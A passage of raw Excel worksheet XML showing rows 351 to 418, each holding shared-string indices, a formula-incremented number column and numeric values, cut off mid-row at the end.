    <row r="351" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A351" t="s">
        <v>678</v>
      </c>
      <c r="B351" t="s">
        <v>679</v>
      </c>
      <c r="C351">
        <f t="shared" si="5"/>
        <v>9868738</v>
      </c>
      <c r="D351" t="s">
        <v>681</v>
      </c>
      <c r="E351">
        <v>0.89468753337860107</v>
      </c>
      <c r="F351">
        <v>2</v>
      </c>
    </row>
    <row r="352" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A352" t="s">
        <v>682</v>
      </c>
      <c r="B352" t="s">
        <v>683</v>
      </c>
      <c r="C352">
        <f t="shared" si="5"/>
        <v>9869991</v>
      </c>
      <c r="D352" t="s">
        <v>684</v>
      </c>
      <c r="E352">
        <v>27.182380676269531</v>
      </c>
      <c r="F352">
        <v>1</v>
      </c>
    </row>
    <row r="353" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A353" t="s">
        <v>682</v>
      </c>
      <c r="B353" t="s">
        <v>683</v>
      </c>
      <c r="C353">
        <f t="shared" si="5"/>
        <v>9871244</v>
      </c>
      <c r="D353" t="s">
        <v>685</v>
      </c>
      <c r="E353">
        <v>14.00684833526611</v>
      </c>
      <c r="F353">
        <v>2</v>
      </c>
    </row>
    <row r="354" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A354" t="s">
        <v>686</v>
      </c>
      <c r="B354" t="s">
        <v>687</v>
      </c>
      <c r="C354">
        <f t="shared" si="5"/>
        <v>9872497</v>
      </c>
      <c r="D354" t="s">
        <v>688</v>
      </c>
      <c r="E354">
        <v>25.968166351318359</v>
      </c>
      <c r="F354">
        <v>1</v>
      </c>
    </row>
    <row r="355" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A355" t="s">
        <v>686</v>
      </c>
      <c r="B355" t="s">
        <v>687</v>
      </c>
      <c r="C355">
        <f t="shared" si="5"/>
        <v>9873750</v>
      </c>
      <c r="D355" t="s">
        <v>689</v>
      </c>
      <c r="E355">
        <v>1.1750988960266111</v>
      </c>
      <c r="F355">
        <v>2</v>
      </c>
    </row>
    <row r="356" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A356" t="s">
        <v>690</v>
      </c>
      <c r="B356" t="s">
        <v>691</v>
      </c>
      <c r="C356">
        <f t="shared" si="5"/>
        <v>9875003</v>
      </c>
      <c r="D356" t="s">
        <v>692</v>
      </c>
      <c r="E356">
        <v>26.083208084106449</v>
      </c>
      <c r="F356">
        <v>1</v>
      </c>
    </row>
    <row r="357" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A357" t="s">
        <v>690</v>
      </c>
      <c r="B357" t="s">
        <v>691</v>
      </c>
      <c r="C357">
        <f t="shared" si="5"/>
        <v>9876256</v>
      </c>
      <c r="D357" t="s">
        <v>693</v>
      </c>
      <c r="E357">
        <v>15.90082359313965</v>
      </c>
      <c r="F357">
        <v>2</v>
      </c>
    </row>
    <row r="358" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A358" t="s">
        <v>694</v>
      </c>
      <c r="B358" t="s">
        <v>695</v>
      </c>
      <c r="C358">
        <f t="shared" si="5"/>
        <v>9877509</v>
      </c>
      <c r="D358" t="s">
        <v>696</v>
      </c>
      <c r="E358">
        <v>29.732179641723629</v>
      </c>
      <c r="F358">
        <v>1</v>
      </c>
    </row>
    <row r="359" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A359" t="s">
        <v>694</v>
      </c>
      <c r="B359" t="s">
        <v>695</v>
      </c>
      <c r="C359">
        <f t="shared" si="5"/>
        <v>9878762</v>
      </c>
      <c r="D359" t="s">
        <v>697</v>
      </c>
      <c r="E359">
        <v>6.6349916458129883</v>
      </c>
      <c r="F359">
        <v>2</v>
      </c>
    </row>
    <row r="360" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A360" t="s">
        <v>698</v>
      </c>
      <c r="B360" t="s">
        <v>699</v>
      </c>
      <c r="C360">
        <f t="shared" si="5"/>
        <v>9880015</v>
      </c>
      <c r="D360" t="s">
        <v>700</v>
      </c>
      <c r="E360">
        <v>25.088052749633789</v>
      </c>
      <c r="F360">
        <v>1</v>
      </c>
    </row>
    <row r="361" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A361" t="s">
        <v>698</v>
      </c>
      <c r="B361" t="s">
        <v>699</v>
      </c>
      <c r="C361">
        <f t="shared" si="5"/>
        <v>9881268</v>
      </c>
      <c r="D361" t="s">
        <v>701</v>
      </c>
      <c r="E361">
        <v>7.5695030391216278E-2</v>
      </c>
      <c r="F361">
        <v>2</v>
      </c>
    </row>
    <row r="362" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A362" t="s">
        <v>702</v>
      </c>
      <c r="B362" t="s">
        <v>703</v>
      </c>
      <c r="C362">
        <f t="shared" si="5"/>
        <v>9882521</v>
      </c>
      <c r="D362" t="s">
        <v>704</v>
      </c>
      <c r="E362">
        <v>29.150087356567379</v>
      </c>
      <c r="F362">
        <v>1</v>
      </c>
    </row>
    <row r="363" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A363" t="s">
        <v>702</v>
      </c>
      <c r="B363" t="s">
        <v>703</v>
      </c>
      <c r="C363">
        <f t="shared" si="5"/>
        <v>9883774</v>
      </c>
      <c r="D363" t="s">
        <v>705</v>
      </c>
      <c r="E363">
        <v>2.9269931316375728</v>
      </c>
      <c r="F363">
        <v>2</v>
      </c>
    </row>
    <row r="364" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A364" t="s">
        <v>706</v>
      </c>
      <c r="B364" t="s">
        <v>707</v>
      </c>
      <c r="C364">
        <f t="shared" si="5"/>
        <v>9885027</v>
      </c>
      <c r="D364" t="s">
        <v>708</v>
      </c>
      <c r="E364">
        <v>25.696176528930661</v>
      </c>
      <c r="F364">
        <v>1</v>
      </c>
    </row>
    <row r="365" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A365" t="s">
        <v>706</v>
      </c>
      <c r="B365" t="s">
        <v>707</v>
      </c>
      <c r="C365">
        <f t="shared" si="5"/>
        <v>9886280</v>
      </c>
      <c r="D365" t="s">
        <v>709</v>
      </c>
      <c r="E365">
        <v>4.4024581909179688</v>
      </c>
      <c r="F365">
        <v>2</v>
      </c>
    </row>
    <row r="366" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A366" t="s">
        <v>710</v>
      </c>
      <c r="B366" t="s">
        <v>711</v>
      </c>
      <c r="C366">
        <f t="shared" si="5"/>
        <v>9887533</v>
      </c>
      <c r="D366" t="s">
        <v>712</v>
      </c>
      <c r="E366">
        <v>26.098178863525391</v>
      </c>
      <c r="F366">
        <v>1</v>
      </c>
    </row>
    <row r="367" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A367" t="s">
        <v>710</v>
      </c>
      <c r="B367" t="s">
        <v>711</v>
      </c>
      <c r="C367">
        <f t="shared" si="5"/>
        <v>9888786</v>
      </c>
      <c r="D367" t="s">
        <v>713</v>
      </c>
      <c r="E367">
        <v>14.40388202667236</v>
      </c>
      <c r="F367">
        <v>2</v>
      </c>
    </row>
    <row r="368" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A368" t="s">
        <v>714</v>
      </c>
      <c r="B368" t="s">
        <v>715</v>
      </c>
      <c r="C368">
        <f t="shared" si="5"/>
        <v>9890039</v>
      </c>
      <c r="D368" t="s">
        <v>716</v>
      </c>
      <c r="E368">
        <v>30.038297653198239</v>
      </c>
      <c r="F368">
        <v>1</v>
      </c>
    </row>
    <row r="369" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A369" t="s">
        <v>714</v>
      </c>
      <c r="B369" t="s">
        <v>715</v>
      </c>
      <c r="C369">
        <f t="shared" si="5"/>
        <v>9891292</v>
      </c>
      <c r="D369" t="s">
        <v>717</v>
      </c>
      <c r="E369">
        <v>2.533653192222118E-2</v>
      </c>
      <c r="F369">
        <v>2</v>
      </c>
    </row>
    <row r="370" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A370" t="s">
        <v>718</v>
      </c>
      <c r="B370" t="s">
        <v>719</v>
      </c>
      <c r="C370">
        <f t="shared" si="5"/>
        <v>9892545</v>
      </c>
      <c r="D370" t="s">
        <v>720</v>
      </c>
      <c r="E370">
        <v>24.287429809570309</v>
      </c>
      <c r="F370">
        <v>1</v>
      </c>
    </row>
    <row r="371" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A371" t="s">
        <v>718</v>
      </c>
      <c r="B371" t="s">
        <v>719</v>
      </c>
      <c r="C371">
        <f t="shared" si="5"/>
        <v>9893798</v>
      </c>
      <c r="D371" t="s">
        <v>721</v>
      </c>
      <c r="E371">
        <v>3.7345418240875011E-4</v>
      </c>
      <c r="F371">
        <v>2</v>
      </c>
    </row>
    <row r="372" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A372" t="s">
        <v>722</v>
      </c>
      <c r="B372" t="s">
        <v>723</v>
      </c>
      <c r="C372">
        <f t="shared" si="5"/>
        <v>9895051</v>
      </c>
      <c r="D372" t="s">
        <v>724</v>
      </c>
      <c r="E372">
        <v>20.09735107421875</v>
      </c>
      <c r="F372">
        <v>1</v>
      </c>
    </row>
    <row r="373" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A373" t="s">
        <v>722</v>
      </c>
      <c r="B373" t="s">
        <v>723</v>
      </c>
      <c r="C373">
        <f t="shared" si="5"/>
        <v>9896304</v>
      </c>
      <c r="D373" t="s">
        <v>725</v>
      </c>
      <c r="E373">
        <v>14.25855827331543</v>
      </c>
      <c r="F373">
        <v>2</v>
      </c>
    </row>
    <row r="374" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A374" t="s">
        <v>726</v>
      </c>
      <c r="B374" t="s">
        <v>727</v>
      </c>
      <c r="C374">
        <f t="shared" si="5"/>
        <v>9897557</v>
      </c>
      <c r="D374" t="s">
        <v>728</v>
      </c>
      <c r="E374">
        <v>20.991865158081051</v>
      </c>
      <c r="F374">
        <v>1</v>
      </c>
    </row>
    <row r="375" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A375" t="s">
        <v>726</v>
      </c>
      <c r="B375" t="s">
        <v>727</v>
      </c>
      <c r="C375">
        <f t="shared" si="5"/>
        <v>9898810</v>
      </c>
      <c r="D375" t="s">
        <v>729</v>
      </c>
      <c r="E375">
        <v>5.5638890266418457</v>
      </c>
      <c r="F375">
        <v>2</v>
      </c>
    </row>
    <row r="376" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A376" t="s">
        <v>730</v>
      </c>
      <c r="B376" t="s">
        <v>731</v>
      </c>
      <c r="C376">
        <f t="shared" si="5"/>
        <v>9900063</v>
      </c>
      <c r="D376" t="s">
        <v>732</v>
      </c>
      <c r="E376">
        <v>32.695911407470703</v>
      </c>
      <c r="F376">
        <v>1</v>
      </c>
    </row>
    <row r="377" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A377" t="s">
        <v>730</v>
      </c>
      <c r="B377" t="s">
        <v>731</v>
      </c>
      <c r="C377">
        <f t="shared" si="5"/>
        <v>9901316</v>
      </c>
      <c r="D377" t="s">
        <v>733</v>
      </c>
      <c r="E377">
        <v>13.7537841796875</v>
      </c>
      <c r="F377">
        <v>2</v>
      </c>
    </row>
    <row r="378" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A378" t="s">
        <v>734</v>
      </c>
      <c r="B378" t="s">
        <v>735</v>
      </c>
      <c r="C378">
        <f t="shared" si="5"/>
        <v>9902569</v>
      </c>
      <c r="D378" t="s">
        <v>736</v>
      </c>
      <c r="E378">
        <v>22.76584434509277</v>
      </c>
      <c r="F378">
        <v>1</v>
      </c>
    </row>
    <row r="379" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A379" t="s">
        <v>734</v>
      </c>
      <c r="B379" t="s">
        <v>735</v>
      </c>
      <c r="C379">
        <f t="shared" si="5"/>
        <v>9903822</v>
      </c>
      <c r="D379" t="s">
        <v>737</v>
      </c>
      <c r="E379">
        <v>1.0634691715240481</v>
      </c>
      <c r="F379">
        <v>2</v>
      </c>
    </row>
    <row r="380" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A380" t="s">
        <v>738</v>
      </c>
      <c r="B380" t="s">
        <v>739</v>
      </c>
      <c r="C380">
        <f t="shared" si="5"/>
        <v>9905075</v>
      </c>
      <c r="D380" t="s">
        <v>740</v>
      </c>
      <c r="E380">
        <v>28.217311859130859</v>
      </c>
      <c r="F380">
        <v>1</v>
      </c>
    </row>
    <row r="381" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A381" t="s">
        <v>738</v>
      </c>
      <c r="B381" t="s">
        <v>739</v>
      </c>
      <c r="C381">
        <f t="shared" si="5"/>
        <v>9906328</v>
      </c>
      <c r="D381" t="s">
        <v>741</v>
      </c>
      <c r="E381">
        <v>2.1036120597273111E-3</v>
      </c>
      <c r="F381">
        <v>2</v>
      </c>
    </row>
    <row r="382" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A382" t="s">
        <v>742</v>
      </c>
      <c r="B382" t="s">
        <v>743</v>
      </c>
      <c r="C382">
        <f t="shared" si="5"/>
        <v>9907581</v>
      </c>
      <c r="D382" t="s">
        <v>744</v>
      </c>
      <c r="E382">
        <v>14.967329978942869</v>
      </c>
      <c r="F382">
        <v>1</v>
      </c>
    </row>
    <row r="383" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A383" t="s">
        <v>742</v>
      </c>
      <c r="B383" t="s">
        <v>743</v>
      </c>
      <c r="C383">
        <f t="shared" si="5"/>
        <v>9908834</v>
      </c>
      <c r="D383" t="s">
        <v>745</v>
      </c>
      <c r="E383">
        <v>13.66702842712402</v>
      </c>
      <c r="F383">
        <v>2</v>
      </c>
    </row>
    <row r="384" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A384" t="s">
        <v>746</v>
      </c>
      <c r="B384" t="s">
        <v>747</v>
      </c>
      <c r="C384">
        <f t="shared" si="5"/>
        <v>9910087</v>
      </c>
      <c r="D384" t="s">
        <v>748</v>
      </c>
      <c r="E384">
        <v>27.787799835205082</v>
      </c>
      <c r="F384">
        <v>1</v>
      </c>
    </row>
    <row r="385" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A385" t="s">
        <v>746</v>
      </c>
      <c r="B385" t="s">
        <v>747</v>
      </c>
      <c r="C385">
        <f t="shared" si="5"/>
        <v>9911340</v>
      </c>
      <c r="D385" t="s">
        <v>749</v>
      </c>
      <c r="E385">
        <v>9.8677835464477539</v>
      </c>
      <c r="F385">
        <v>2</v>
      </c>
    </row>
    <row r="386" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A386" t="s">
        <v>750</v>
      </c>
      <c r="B386" t="s">
        <v>751</v>
      </c>
      <c r="C386">
        <f t="shared" si="5"/>
        <v>9912593</v>
      </c>
      <c r="D386" t="s">
        <v>752</v>
      </c>
      <c r="E386">
        <v>23.101289749145511</v>
      </c>
      <c r="F386">
        <v>1</v>
      </c>
    </row>
    <row r="387" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A387" t="s">
        <v>750</v>
      </c>
      <c r="B387" t="s">
        <v>751</v>
      </c>
      <c r="C387">
        <f t="shared" si="5"/>
        <v>9913846</v>
      </c>
      <c r="D387" t="s">
        <v>753</v>
      </c>
      <c r="E387">
        <v>1.001324534416199</v>
      </c>
      <c r="F387">
        <v>2</v>
      </c>
    </row>
    <row r="388" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A388" t="s">
        <v>754</v>
      </c>
      <c r="B388" t="s">
        <v>755</v>
      </c>
      <c r="C388">
        <f t="shared" si="5"/>
        <v>9915099</v>
      </c>
      <c r="D388" t="s">
        <v>756</v>
      </c>
      <c r="E388">
        <v>28.394796371459961</v>
      </c>
      <c r="F388">
        <v>1</v>
      </c>
    </row>
    <row r="389" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A389" t="s">
        <v>754</v>
      </c>
      <c r="B389" t="s">
        <v>755</v>
      </c>
      <c r="C389">
        <f t="shared" si="5"/>
        <v>9916352</v>
      </c>
      <c r="D389" t="s">
        <v>757</v>
      </c>
      <c r="E389">
        <v>3.646488301455975E-3</v>
      </c>
      <c r="F389">
        <v>2</v>
      </c>
    </row>
    <row r="390" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A390" t="s">
        <v>758</v>
      </c>
      <c r="B390" t="s">
        <v>759</v>
      </c>
      <c r="C390">
        <f t="shared" si="5"/>
        <v>9917605</v>
      </c>
      <c r="D390" t="s">
        <v>760</v>
      </c>
      <c r="E390">
        <v>23.834140777587891</v>
      </c>
      <c r="F390">
        <v>1</v>
      </c>
    </row>
    <row r="391" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A391" t="s">
        <v>758</v>
      </c>
      <c r="B391" t="s">
        <v>759</v>
      </c>
      <c r="C391">
        <f t="shared" si="5"/>
        <v>9918858</v>
      </c>
      <c r="D391" t="s">
        <v>761</v>
      </c>
      <c r="E391">
        <v>1.4289224147796631</v>
      </c>
      <c r="F391">
        <v>2</v>
      </c>
    </row>
    <row r="392" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A392" t="s">
        <v>762</v>
      </c>
      <c r="B392" t="s">
        <v>763</v>
      </c>
      <c r="C392">
        <f t="shared" si="5"/>
        <v>9920111</v>
      </c>
      <c r="D392" t="s">
        <v>764</v>
      </c>
      <c r="E392">
        <v>30.185430526733398</v>
      </c>
      <c r="F392">
        <v>1</v>
      </c>
    </row>
    <row r="393" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A393" t="s">
        <v>762</v>
      </c>
      <c r="B393" t="s">
        <v>763</v>
      </c>
      <c r="C393">
        <f t="shared" si="5"/>
        <v>9921364</v>
      </c>
      <c r="D393" t="s">
        <v>765</v>
      </c>
      <c r="E393">
        <v>8.0871515274047852</v>
      </c>
      <c r="F393">
        <v>2</v>
      </c>
    </row>
    <row r="394" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A394" t="s">
        <v>766</v>
      </c>
      <c r="B394" t="s">
        <v>767</v>
      </c>
      <c r="C394">
        <f t="shared" ref="C394:C457" si="6">C393+1253</f>
        <v>9922617</v>
      </c>
      <c r="D394" t="s">
        <v>768</v>
      </c>
      <c r="E394">
        <v>18.1173210144043</v>
      </c>
      <c r="F394">
        <v>1</v>
      </c>
    </row>
    <row r="395" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A395" t="s">
        <v>766</v>
      </c>
      <c r="B395" t="s">
        <v>767</v>
      </c>
      <c r="C395">
        <f t="shared" si="6"/>
        <v>9923870</v>
      </c>
      <c r="D395" t="s">
        <v>769</v>
      </c>
      <c r="E395">
        <v>13.79994583129883</v>
      </c>
      <c r="F395">
        <v>2</v>
      </c>
    </row>
    <row r="396" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A396" t="s">
        <v>770</v>
      </c>
      <c r="B396" t="s">
        <v>771</v>
      </c>
      <c r="C396">
        <f t="shared" si="6"/>
        <v>9925123</v>
      </c>
      <c r="D396" t="s">
        <v>772</v>
      </c>
      <c r="E396">
        <v>21.813741683959961</v>
      </c>
      <c r="F396">
        <v>1</v>
      </c>
    </row>
    <row r="397" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A397" t="s">
        <v>770</v>
      </c>
      <c r="B397" t="s">
        <v>771</v>
      </c>
      <c r="C397">
        <f t="shared" si="6"/>
        <v>9926376</v>
      </c>
      <c r="D397" t="s">
        <v>773</v>
      </c>
      <c r="E397">
        <v>8.8496759533882141E-2</v>
      </c>
      <c r="F397">
        <v>2</v>
      </c>
    </row>
    <row r="398" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A398" t="s">
        <v>774</v>
      </c>
      <c r="B398" t="s">
        <v>775</v>
      </c>
      <c r="C398">
        <f t="shared" si="6"/>
        <v>9927629</v>
      </c>
      <c r="D398" t="s">
        <v>776</v>
      </c>
      <c r="E398">
        <v>28.02556228637695</v>
      </c>
      <c r="F398">
        <v>1</v>
      </c>
    </row>
    <row r="399" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A399" t="s">
        <v>774</v>
      </c>
      <c r="B399" t="s">
        <v>775</v>
      </c>
      <c r="C399">
        <f t="shared" si="6"/>
        <v>9928882</v>
      </c>
      <c r="D399" t="s">
        <v>777</v>
      </c>
      <c r="E399">
        <v>4.2632441520690918</v>
      </c>
      <c r="F399">
        <v>2</v>
      </c>
    </row>
    <row r="400" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A400" t="s">
        <v>778</v>
      </c>
      <c r="B400" t="s">
        <v>237</v>
      </c>
      <c r="C400">
        <f t="shared" si="6"/>
        <v>9930135</v>
      </c>
      <c r="D400" t="s">
        <v>238</v>
      </c>
      <c r="E400">
        <v>26.833955764770511</v>
      </c>
      <c r="F400">
        <v>1</v>
      </c>
    </row>
    <row r="401" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A401" t="s">
        <v>778</v>
      </c>
      <c r="B401" t="s">
        <v>237</v>
      </c>
      <c r="C401">
        <f t="shared" si="6"/>
        <v>9931388</v>
      </c>
      <c r="D401" t="s">
        <v>779</v>
      </c>
      <c r="E401">
        <v>5.132260799407959</v>
      </c>
      <c r="F401">
        <v>2</v>
      </c>
    </row>
    <row r="402" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A402" t="s">
        <v>780</v>
      </c>
      <c r="B402" t="s">
        <v>781</v>
      </c>
      <c r="C402">
        <f t="shared" si="6"/>
        <v>9932641</v>
      </c>
      <c r="D402" t="s">
        <v>782</v>
      </c>
      <c r="E402">
        <v>26.600248336791989</v>
      </c>
      <c r="F402">
        <v>1</v>
      </c>
    </row>
    <row r="403" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A403" t="s">
        <v>780</v>
      </c>
      <c r="B403" t="s">
        <v>781</v>
      </c>
      <c r="C403">
        <f t="shared" si="6"/>
        <v>9933894</v>
      </c>
      <c r="D403" t="s">
        <v>783</v>
      </c>
      <c r="E403">
        <v>8.0375127792358398</v>
      </c>
      <c r="F403">
        <v>2</v>
      </c>
    </row>
    <row r="404" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A404" t="s">
        <v>784</v>
      </c>
      <c r="B404" t="s">
        <v>785</v>
      </c>
      <c r="C404">
        <f t="shared" si="6"/>
        <v>9935147</v>
      </c>
      <c r="D404" t="s">
        <v>786</v>
      </c>
      <c r="E404">
        <v>27.3681755065918</v>
      </c>
      <c r="F404">
        <v>1</v>
      </c>
    </row>
    <row r="405" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A405" t="s">
        <v>784</v>
      </c>
      <c r="B405" t="s">
        <v>785</v>
      </c>
      <c r="C405">
        <f t="shared" si="6"/>
        <v>9936400</v>
      </c>
      <c r="D405" t="s">
        <v>787</v>
      </c>
      <c r="E405">
        <v>12.624757766723629</v>
      </c>
      <c r="F405">
        <v>2</v>
      </c>
    </row>
    <row r="406" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A406" t="s">
        <v>788</v>
      </c>
      <c r="B406" t="s">
        <v>789</v>
      </c>
      <c r="C406">
        <f t="shared" si="6"/>
        <v>9937653</v>
      </c>
      <c r="D406" t="s">
        <v>790</v>
      </c>
      <c r="E406">
        <v>25.17984580993652</v>
      </c>
      <c r="F406">
        <v>1</v>
      </c>
    </row>
    <row r="407" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A407" t="s">
        <v>788</v>
      </c>
      <c r="B407" t="s">
        <v>789</v>
      </c>
      <c r="C407">
        <f t="shared" si="6"/>
        <v>9938906</v>
      </c>
      <c r="D407" t="s">
        <v>791</v>
      </c>
      <c r="E407">
        <v>16.060367584228519</v>
      </c>
      <c r="F407">
        <v>2</v>
      </c>
    </row>
    <row r="408" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A408" t="s">
        <v>792</v>
      </c>
      <c r="B408" t="s">
        <v>793</v>
      </c>
      <c r="C408">
        <f t="shared" si="6"/>
        <v>9940159</v>
      </c>
      <c r="D408" t="s">
        <v>794</v>
      </c>
      <c r="E408">
        <v>30.789768218994141</v>
      </c>
      <c r="F408">
        <v>1</v>
      </c>
    </row>
    <row r="409" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A409" t="s">
        <v>792</v>
      </c>
      <c r="B409" t="s">
        <v>793</v>
      </c>
      <c r="C409">
        <f t="shared" si="6"/>
        <v>9941412</v>
      </c>
      <c r="D409" t="s">
        <v>795</v>
      </c>
      <c r="E409">
        <v>6.7848911285400391</v>
      </c>
      <c r="F409">
        <v>2</v>
      </c>
    </row>
    <row r="410" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A410" t="s">
        <v>796</v>
      </c>
      <c r="B410" t="s">
        <v>797</v>
      </c>
      <c r="C410">
        <f t="shared" si="6"/>
        <v>9942665</v>
      </c>
      <c r="D410" t="s">
        <v>798</v>
      </c>
      <c r="E410">
        <v>22.830497741699219</v>
      </c>
      <c r="F410">
        <v>1</v>
      </c>
    </row>
    <row r="411" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A411" t="s">
        <v>796</v>
      </c>
      <c r="B411" t="s">
        <v>797</v>
      </c>
      <c r="C411">
        <f t="shared" si="6"/>
        <v>9943918</v>
      </c>
      <c r="D411" t="s">
        <v>799</v>
      </c>
      <c r="E411">
        <v>1.8352458477020259</v>
      </c>
      <c r="F411">
        <v>2</v>
      </c>
    </row>
    <row r="412" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A412" t="s">
        <v>800</v>
      </c>
      <c r="B412" t="s">
        <v>801</v>
      </c>
      <c r="C412">
        <f t="shared" si="6"/>
        <v>9945171</v>
      </c>
      <c r="D412" t="s">
        <v>802</v>
      </c>
      <c r="E412">
        <v>27.889341354370121</v>
      </c>
      <c r="F412">
        <v>1</v>
      </c>
    </row>
    <row r="413" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A413" t="s">
        <v>800</v>
      </c>
      <c r="B413" t="s">
        <v>801</v>
      </c>
      <c r="C413">
        <f t="shared" si="6"/>
        <v>9946424</v>
      </c>
      <c r="D413" t="s">
        <v>803</v>
      </c>
      <c r="E413">
        <v>9.1426229476928711</v>
      </c>
      <c r="F413">
        <v>2</v>
      </c>
    </row>
    <row r="414" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A414" t="s">
        <v>804</v>
      </c>
      <c r="B414" t="s">
        <v>805</v>
      </c>
      <c r="C414">
        <f t="shared" si="6"/>
        <v>9947677</v>
      </c>
      <c r="D414" t="s">
        <v>806</v>
      </c>
      <c r="E414">
        <v>13.19772529602051</v>
      </c>
      <c r="F414">
        <v>1</v>
      </c>
    </row>
    <row r="415" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A415" t="s">
        <v>804</v>
      </c>
      <c r="B415" t="s">
        <v>805</v>
      </c>
      <c r="C415">
        <f t="shared" si="6"/>
        <v>9948930</v>
      </c>
      <c r="D415" t="s">
        <v>807</v>
      </c>
      <c r="E415">
        <v>0.17440302670001981</v>
      </c>
      <c r="F415">
        <v>2</v>
      </c>
    </row>
    <row r="416" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A416" t="s">
        <v>808</v>
      </c>
      <c r="B416" t="s">
        <v>809</v>
      </c>
      <c r="C416">
        <f t="shared" si="6"/>
        <v>9950183</v>
      </c>
      <c r="D416" t="s">
        <v>810</v>
      </c>
      <c r="E416">
        <v>23.418645858764648</v>
      </c>
      <c r="F416">
        <v>1</v>
      </c>
    </row>
    <row r="417" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A417" t="s">
        <v>808</v>
      </c>
      <c r="B417" t="s">
        <v>809</v>
      </c>
      <c r="C417">
        <f t="shared" si="6"/>
        <v>9951436</v>
      </c>
      <c r="D417" t="s">
        <v>811</v>
      </c>
      <c r="E417">
        <v>4.4059205055236816</v>
      </c>
      <c r="F417">
        <v>2</v>
      </c>
    </row>
    <row r="418" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A418" t="s">
        <v>812</v>
      </c>
      <c r="B418" t="s">
        <v>813</v>
      </c>
      <c r="C418">
        <f t="shared" si="6"/>
        <v>9952689</v>
      </c>
      <c r="D418" t="s">
        <v>814</v>
      </c>
      <c r="E418">
        <v>28.02580451965332</v>
      </c>
      <c r="F418">
